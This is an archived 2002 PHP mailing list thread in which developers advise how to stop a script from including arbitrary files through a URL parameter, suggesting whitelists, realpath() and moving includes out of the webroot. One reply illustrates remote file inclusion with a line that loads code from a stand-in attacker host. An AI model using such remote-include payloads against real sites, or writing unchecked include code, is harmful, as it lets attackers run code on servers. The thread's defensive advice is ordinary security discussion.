RE: [PHP] Umm... Uh-oh
That still wouldn't fix anything if you're including a file based on unchecked user input. Make an array in your file of "safe" files to include, that can be designated by the user. $safe_files = array("file1","file2","file3"); include("/path/to/include/" . $safe_files[$_GET['include']] . ".php"); or... switch($_GET['include']) { case 1: include("file1.php"); break; case 2: include("file2.php"); break; } You should really, really, rethink your design where you have to include files based on something passed in the url. ---John Holmes... > -Original Message- > From: John Wards [mailto:[EMAIL PROTECTED]] > Sent: Friday, October 04, 2002 6:14 AM > To: Stas Maximov > Cc: PHP General > Subject: Re: [PHP] Umm... Uh-oh > > ah never thought of that! > > John > > On Friday 04 Oct 2002 11:14 am, Stas Maximov wrote: > > The easiest and safest way to get around this problem is to place all > your > > include files outside of your webroot directory (say one level up), so > they > > will be accessible locally via includes, but NOT accessible via http. > > > > HTH, Stas > > > > - Original Message - > > From: "John Wards" <[EMAIL PROTECTED]> > > To: "PHP" <[EMAIL PROTECTED]> > > Sent: Friday, October 04, 2002 10:58 AM > > Subject: Re: [PHP] Umm... Uh-oh > > > > > > erm..would that alow hackers access? Say I have a database include > file > > would hackers be able to get access to my database like this? > > > > (include('http://mysite.com/datainc.php');) > > > > I hope bloody not!!! if so how on earth do i get round that! > > > > John > > > > On Friday 04 Oct 2002 10:52 am, Marek Kilimajer wrote: > > > Use realpath() to check the path. I also suspect your script is > > > vulnarable to cross-site includes > > > (include('http://hacker.com/script.inc');) > > > > > > Rick Beckman wrote: > > > >Okay, I was mistaken... There is a gaping security hole in my simple > > > > li'l script... How do I modify it to only accept files from a > certain > > > > path? I want the url format to be script.php?call=1 where "1" is the > > > > called file in the /includes/ directory. Just when I get optimistic > I > > > > leave the entire system exposed. Yeah, that fits with my luck. :-) > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Umm... Uh-oh
ah never thought of that! John On Friday 04 Oct 2002 11:14 am, Stas Maximov wrote: > The easiest and safest way to get around this problem is to place all your > include files outside of your webroot directory (say one level up), so they > will be accessible locally via includes, but NOT accessible via http. > > HTH, Stas > > - Original Message - > From: "John Wards" <[EMAIL PROTECTED]> > To: "PHP" <[EMAIL PROTECTED]> > Sent: Friday, October 04, 2002 10:58 AM > Subject: Re: [PHP] Umm... Uh-oh > > > erm..would that alow hackers access? Say I have a database include file > would hackers be able to get access to my database like this? > > (include('http://mysite.com/datainc.php');) > > I hope bloody not!!! if so how on earth do i get round that! > > John > > On Friday 04 Oct 2002 10:52 am, Marek Kilimajer wrote: > > Use realpath() to check the path. I also suspect your script is > > vulnarable to cross-site includes > > (include('http://hacker.com/script.inc');) > > > > Rick Beckman wrote: > > >Okay, I was mistaken... There is a gaping security hole in my simple > > > li'l script... How do I modify it to only accept files from a certain > > > path? I want the url format to be script.php?call=1 where "1" is the > > > called file in the /includes/ directory. Just when I get optimistic I > > > leave the entire system exposed. Yeah, that fits with my luck. :-) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Umm... Uh-oh
The easiest and safest way to get around this problem is to place all your include files outside of your webroot directory (say one level up), so they will be accessible locally via includes, but NOT accessible via http. HTH, Stas - Original Message - From: "John Wards" <[EMAIL PROTECTED]> To: "PHP" <[EMAIL PROTECTED]> Sent: Friday, October 04, 2002 10:58 AM Subject: Re: [PHP] Umm... Uh-oh erm..would that alow hackers access? Say I have a database include file would hackers be able to get access to my database like this? (include('http://mysite.com/datainc.php');) I hope bloody not!!! if so how on earth do i get round that! John On Friday 04 Oct 2002 10:52 am, Marek Kilimajer wrote: > Use realpath() to check the path. I also suspect your script is > vulnarable to cross-site includes > (include('http://hacker.com/script.inc');) > > Rick Beckman wrote: > >Okay, I was mistaken... There is a gaping security hole in my simple li'l > >script... How do I modify it to only accept files from a certain path? I > >want the url format to be script.php?call=1 where "1" is the called file > > in the /includes/ directory. Just when I get optimistic I leave the > > entire system exposed. Yeah, that fits with my luck. :-) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Umm... Uh-oh
That would not help you if you include files based on unchecked user input. Justin French wrote: >all my include files are *.inc, and I have a .htaccess file that makes >apache refuse to serve those files directly thru http. > >Justin > > >on 04/10/02 7:58 PM, John Wards ([EMAIL PROTECTED]) wrote: > > > >>erm..would that alow hackers access? Say I have a database include file >>would hackers be able to get access to my database like this? >> >>(include('http://mysite.com/datainc.php');) >> >>I hope bloody not!!! if so how on earth do i get round that! >> >>John >> >>On Friday 04 Oct 2002 10:52 am, Marek Kilimajer wrote: >> >> >>>Use realpath() to check the path. I also suspect your script is >>>vulnarable to cross-site includes >>>(include('http://hacker.com/script.inc');) >>> >>>Rick Beckman wrote: >>> >>> Okay, I was mistaken... There is a gaping security hole in my simple li'l script... How do I modify it to only accept files from a certain path? I want the url format to be script.php?call=1 where "1" is the called file in the /includes/ directory. Just when I get optimistic I leave the entire system exposed. Yeah, that fits with my luck. :-) >>-- >>PHP General Mailing List (http://www.php.net/) >>To unsubscribe, visit: http://www.php.net/unsub.php >> >> >> > > > > -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Umm... Uh-oh
so as my files are all .php I would be okay from an external hacking attempt? I don't have any worry about internal as I am on a dedicated server John On Friday 04 Oct 2002 11:02 am, Justin French wrote: > all my include files are *.inc, and I have a .htaccess file that makes > apache refuse to serve those files directly thru http. > > Justin > > on 04/10/02 7:58 PM, John Wards ([EMAIL PROTECTED]) wrote: > > erm..would that alow hackers access? Say I have a database include > > file would hackers be able to get access to my database like this? > > > > (include('http://mysite.com/datainc.php');) > > > > I hope bloody not!!! if so how on earth do i get round that! > > > > John > > > > On Friday 04 Oct 2002 10:52 am, Marek Kilimajer wrote: > >> Use realpath() to check the path. I also suspect your script is > >> vulnarable to cross-site includes > >> (include('http://hacker.com/script.inc');) > >> > >> Rick Beckman wrote: > >>> Okay, I was mistaken... There is a gaping security hole in my simple > >>> li'l script... How do I modify it to only accept files from a certain > >>> path? I want the url format to be script.php?call=1 where "1" is the > >>> called file in the /includes/ directory. Just when I get optimistic I > >>> leave the entire system exposed. Yeah, that fits with my luck. :-) > > > > -- > > PHP General Mailing List (http://www.php.net/) > > To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Umm... Uh-oh
all my include files are *.inc, and I have a .htaccess file that makes apache refuse to serve those files directly thru http. Justin on 04/10/02 7:58 PM, John Wards ([EMAIL PROTECTED]) wrote: > erm..would that alow hackers access? Say I have a database include file > would hackers be able to get access to my database like this? > > (include('http://mysite.com/datainc.php');) > > I hope bloody not!!! if so how on earth do i get round that! > > John > > On Friday 04 Oct 2002 10:52 am, Marek Kilimajer wrote: >> Use realpath() to check the path. I also suspect your script is >> vulnarable to cross-site includes >> (include('http://hacker.com/script.inc');) >> >> Rick Beckman wrote: >>> Okay, I was mistaken... There is a gaping security hole in my simple li'l >>> script... How do I modify it to only accept files from a certain path? I >>> want the url format to be script.php?call=1 where "1" is the called file >>> in the /includes/ directory. Just when I get optimistic I leave the >>> entire system exposed. Yeah, that fits with my luck. :-) > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Umm... Uh-oh
erm..would that alow hackers access? Say I have a database include file would hackers be able to get access to my database like this? (include('http://mysite.com/datainc.php');) I hope bloody not!!! if so how on earth do i get round that! John On Friday 04 Oct 2002 10:52 am, Marek Kilimajer wrote: > Use realpath() to check the path. I also suspect your script is > vulnarable to cross-site includes > (include('http://hacker.com/script.inc');) > > Rick Beckman wrote: > >Okay, I was mistaken... There is a gaping security hole in my simple li'l > >script... How do I modify it to only accept files from a certain path? I > >want the url format to be script.php?call=1 where "1" is the called file > > in the /includes/ directory. Just when I get optimistic I leave the > > entire system exposed. Yeah, that fits with my luck. :-) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Umm... Uh-oh
Use realpath() to check the path. I also suspect your script is vulnarable to cross-site includes (include('http://hacker.com/script.inc');) Rick Beckman wrote: >Okay, I was mistaken... There is a gaping security hole in my simple li'l >script... How do I modify it to only accept files from a certain path? I >want the url format to be script.php?call=1 where "1" is the called file in >the /includes/ directory. Just when I get optimistic I leave the entire >system exposed. Yeah, that fits with my luck. :-) > > > -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php